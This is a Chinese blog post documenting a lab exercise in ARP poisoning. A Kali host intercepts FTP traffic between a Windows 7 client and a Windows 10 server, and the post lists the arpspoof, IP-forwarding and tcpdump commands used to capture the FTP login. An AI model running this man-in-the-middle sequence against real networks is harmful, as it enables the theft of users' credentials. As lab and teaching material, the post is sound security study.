ARP投毒之获取密码

配置环境:
kali(中间人):192.168.3.90
win7pro(PC机):192.168.3.91
win10(ftp服务):192.168.3.83
*三台主机相互PING通

实验原理:PC机访问本网络的一台FPTserver服务的主机,中间人kali进行arp投毒,获取PC机和FTPserver主机之间的回话记录,截获用户名和密码。

图片.png

step1:中间人kali开启路由转发功能:
echo 1 > /proc/sys/net/ipv4/ip_forward


step2:进行ARP投毒

1:PC机要向FTPserver发送报文,kali欺骗PC机说自己是FTPserver;
指令:arpspoof -i eth0 -t 192.168.3.91 192.168.3.83


图片.png

2: 接下来开始欺骗FTP,同理,kali(中间人)进行欺骗,欺骗FTP说自己是PC机
指令:arpspoof -i eth0 -t 192.168.3.83 192.168.3.91

图片.png

step3:

kali(中间人) 进行抓包模式
指令:tcpdump -i eth0 -nn -X tcp port 21

图片.png

step4:

之前我们在win10上用(3CDaemon)搭建的FTP的用户名为admin 密码为123456

step5:

我们在win7pro上进行ftp命令,连接到win10(FTPserver)上,并输入之前搭建的FTP账户和密码


图片.png

step6:

查看刚刚我们用kali的抓包,可以准确的截获用户名和密码


图片.png
©著作权归作者所有,转载或内容合作请联系作者
平台声明:文章内容(如有图片或视频亦包括在内)由作者上传并发布,文章内容仅代表作者本人观点,简书系信息发布平台,仅提供信息存储服务。

推荐阅读更多精彩内容

  • 1、第八章 Samba服务器2、第八章 NFS服务器3、第十章 Linux下DNS服务器配站点,域名解析概念命令:...
    哈熝少主阅读 3,788评论 0 10
  • 名词延伸 通俗的说,域名就相当于一个家庭的门牌号码,别人通过这个号码可以很容易的找到你。如果把IP地址比作一间房子...
    杨大虾阅读 20,651评论 2 56
  • FTP服务概述 简单FTP构建及访问 VSFTP服务基础 用户禁锢、黑白名单 FTP并发及带宽限制 一、FTP服务...
    紫_轩阅读 7,750评论 3 25
  • MHA是什么? MHA是由日本Mysql专家用Perl写的一套Mysql故障切换方案,来保障数据库的高可用性,它的...
    张伟科阅读 664评论 0 1
  • 今晚的月光很亮很亮,越这样周围也就越黑暗,这样鲜明的对比,配合着夜晚清冷的风啊,真是……合适。 其实,这样的月色突...
    离人莫叹阅读 258评论 0 0